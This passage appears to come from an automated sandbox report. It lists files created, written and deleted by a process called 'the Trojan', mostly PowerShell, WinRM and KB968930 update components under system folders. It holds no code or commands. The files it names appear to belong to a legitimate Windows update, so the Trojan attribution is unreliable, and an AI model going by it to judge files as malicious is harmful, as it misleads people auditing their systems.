%System%\WindowsPowerShell\v1.0\SET66.tmp (20 bytes)
%System%\SET29.tmp (22 bytes)
%System%\SET2B.tmp (2 bytes)
%System%\SET41.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (4185 bytes)
%System%\SET2E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETD4.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (6 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (1 bytes)
%System%\SET45.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (12 bytes)
%System%\SETDA.tmp (42 bytes)
%System%\SET4C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (8 bytes)
%System%\SET4A.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (18248 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (17 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (40 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5705 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (9 bytes)
%System%\SET27.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETC2.tmp (3 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\wbem\SET39.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (57 bytes)
%System%\config (200 bytes)
%System%\SET42.tmp (601 bytes)
%System%\SET3E.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (1 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SET43.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (8 bytes)
%System%\SET26.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (2 bytes)
%System%\SET21.tmp (2 bytes)
%System%\config\system (3202 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (2 bytes)
%WinDir%\msmqinst.log (5468 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETE3.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (4 bytes)
%System%\SET3C.tmp (35 bytes)
%System%\SET32.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETE9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (11 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\SET46.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDB.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (601 bytes)
%System%\CatRoot2\dberr.txt (1037 bytes)
%System%\GroupPolicy\Adm\SET37.tmp (2 bytes)
%WinDir%\iis6.log (136883 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (15 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (7 bytes)
%System%\SET48.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETC4.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (673 bytes)
%WinDir%\inf\SET4D.tmp (38 bytes)
%System%\SET28.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETE1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (15 bytes)
%System%\SET31.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (12 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD8.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (27 bytes)
%System%\SET3F.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETC5.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (2 bytes)
%System%\SET2C.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (21 bytes)
%WinDir%\KB968930.log (245685 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\SET3B.tmp (2 bytes)
%System%\SET4B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (601 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (19 bytes)
%System%\SET24.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDE.tmp (673 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (10 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETE5.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (10 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\GroupPolicy\Adm\SET51.tmp (2 bytes)
%System%\SET40.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETD5.tmp (7 bytes)
%WinDir%\ocgen.log (71000 bytes)
%WinDir%\inf\SET4E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\SET2F.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (1281 bytes)
%System%\SET47.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (24 bytes)
%System%\winrm\0409\SET38.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET50.tmp (12 bytes)
%System%\SET30.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (22 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (6 bytes)
%System%\SET23.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (13 bytes)
%WinDir%\inf\SET33.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD9.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (9 bytes)

The Trojan deletes the following file(s):

%System%\WindowsPowerShell\v1.0\SETE2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\winrm\0409\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\Help\SETE0.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\SET44.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET4F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETD7.tmp (0 bytes)
%System%\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%WinDir%\inf\SET34.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (0 bytes)
%System%\wbem\SET1F.tmp (0 bytes)
%System%\SET49.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDE.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE6.tmp (0 bytes)
%WinDir%\SECF3.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\SET41.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\SET32.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\SET45.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\SETDA.tmp (0 bytes)
%System%\SET4C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\SET4A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\wbem\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE3.tmp (0 bytes)
%System%\SET42.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\SET3E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\SET43.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDB.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\SET3C.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE9.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\GroupPolicy\Adm\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\SET48.tmp (0 bytes)
%WinDir%\Temp\UPD1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (0 bytes)
%System%\SET3B.tmp (0 bytes)
%System%\SET4B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%WinDir%\inf\SET4D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC4.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\GroupPolicy\Adm\SET51.tmp (0 bytes)
%System%\SET40.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDF.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD5.tmp (0 bytes)
%WinDir%\inf\SET4E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\SET47.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrm\0409\SET38.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET50.tmp (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)

The process PSCustomSetupUtil.exe:2428 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\PADGJMQT\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSCustomSetupUtil.exe:3452 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\4ORUX047\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:3416 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\I147AEHK\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:2800 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\5NRUX036\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3068 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\UEILORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:3232 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CWZ258BE\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2484 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\6QTWZ258\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:2548 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\8RUX0369\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3344 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\M69DGJMP\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:2388 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\EX0369CF\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:3664 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\1KNQUX03\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2600 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\VFILORUX\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2876 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\BVZ258BF\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3884 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\PADGJMPT\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process PSCustomSetupUtil.exe:3932 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\EVZ258BE\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:2976 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\H258BFIL\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:3704 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\5PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3544 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\UEHKNQTW\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:3140 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\AUX0369D\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3784 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\3MQTWZ36\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3224 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\H147BEHK\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:3984 makes changes in the file system.


